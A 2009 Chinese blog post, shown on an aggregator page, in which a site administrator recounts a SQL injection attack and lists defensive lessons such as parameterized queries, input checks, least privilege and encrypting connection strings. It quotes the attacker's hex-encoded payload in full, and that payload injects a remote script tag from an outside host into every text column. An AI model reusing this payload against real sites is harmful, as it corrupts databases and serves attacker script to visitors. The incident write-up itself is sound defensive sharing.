惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

S
Security Affairs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Jina AI
Jina AI
P
Palo Alto Networks Blog
GbyAI
GbyAI
大猫的无限游戏
大猫的无限游戏
A
Arctic Wolf
Hugging Face - Blog
Hugging Face - Blog
小众软件
小众软件
Y
Y Combinator Blog
T
The Blog of Author Tim Ferriss
Blog — PlanetScale
Blog — PlanetScale
S
Schneier on Security
V
Vulnerabilities – Threatpost
C
Cybersecurity and Infrastructure Security Agency CISA
雷峰网
雷峰网
T
Tenable Blog
人人都是产品经理
人人都是产品经理
T
Tor Project blog
C
Cyber Attacks, Cyber Crime and Cyber Security
AWS News Blog
AWS News Blog
Microsoft Security Blog
Microsoft Security Blog
J
Java Code Geeks
Scott Helme
Scott Helme
SecWiki News
SecWiki News
C
CERT Recently Published Vulnerability Notes
Recorded Future
Recorded Future
I
InfoQ
Security Archives - TechRepublic
Security Archives - TechRepublic
Help Net Security
Help Net Security
Cloudbric
Cloudbric
C
Check Point Blog
Engineering at Meta
Engineering at Meta
TaoSecurity Blog
TaoSecurity Blog
B
Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
博客园_首页
N
News and Events Feed by Topic
云风的 BLOG
云风的 BLOG
MyScale Blog
MyScale Blog
腾讯CDC
量子位
Application and Cybersecurity Blog
Application and Cybersecurity Blog
K
Kaspersky official blog
Vercel News
Vercel News
F
Full Disclosure
T
Troy Hunt's Blog
Forbes - Security
Forbes - Security
S
Security @ Cisco Blogs

博客园 - Teracy

扫站:比较购物网站列表 MVC 2.0 学习笔记 和 Demo共享 网络书签的代码整理 电子商务的认知 招聘Net软件工程师,网站设计师 sql2005数据库sa密码忘记了,该怎么办? 08年最后一天该说点什么了 邀请大家谈谈山寨版 工作小结 + 发布新的邮件发送工具 在ASP.NET中自动给URL地址加上超链接 把搜索引擎营销变成你的企业营销绩效飞跃重要策略 Google搜索引擎排名技巧 在ASP.NET中显示进度条-ASP.NET ASP.NET2.0实现无刷新客户端回调(热点技术) 工作记录 上班时间也要忙里偷闲 项目小结+Repeater中如何使用单选按钮 招聘Net软件工程师,测试工程师: 招聘ASP.NET技术人员
2009年12月的工作发现
Teracy · 2009-12-08 · via 博客园 - Teracy

很久没有来这里冒一个泡泡了,借口:太忙。

最近最头疼的莫过于管理的其中一个网站被注入式攻击,查日志查了两天才找到源头,那哥们通过16进制编码后绕过了关键字过滤的SQL恶意注入:

.aspx?sysno=2;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f383838312e73732e6c612f3e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52%20eXeC(@s)--@s%20vArChAr(8000)%20sEt%.........

类似上面的代码,很长。 今天终于算是松了一口气,这几天因为这个睡觉都不踏实。

教训:

1.切忌不要使用sql拼接字符串操作数据库,不能投方便;

2.对所有URL上的参数进行类型,长度等安全检查;

3.数据库的账户权限得一个个分配,不能偷懒;

4.Web.Config文件中的连接字符串最好加密。

最近发现用下面的方式比较保险的,运行中输入:

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe -pef "connectionStrings"  "E:\\Shopping" ;

如果是64位系统的服务器就要用:C:\WINDOWS\Microsoft.NET\Framework64\v2.0.50727\aspnet_regiis.exe -pef "connectionStrings"  "E:\\Shopping"

注意上面命令的空格。

5.对所有新手写的方法建议那些项目组长都check 一遍代码,不然带来的后果还是项目组长得承担;

另外,找到微软的一个小工具:

https://files.cnblogs.com/teracy/Scrawlr.rar  检查网站漏洞的,可惜是我找到我们网站漏洞后才找到这个工具的,用这个工具一下就能找到网站漏洞,微软的东西,还不错。推荐给园子里需要的朋友。

另外一个工具是远程协助的工具,蛮好玩的,在公司可以控制家里的电脑。不过服务器版的系统不能控制,只能看,呵呵

下载地址:  https://files.cnblogs.com/teracy/TeamViewerchs.rar

好久没有来这里发布文章了,看博客园的首页的文章和原来不一样了,是不是我也可以借此机会放到首页亮一下,

希望上面提到的几点和提供的一些东西能对做web的朋友起一点点作用。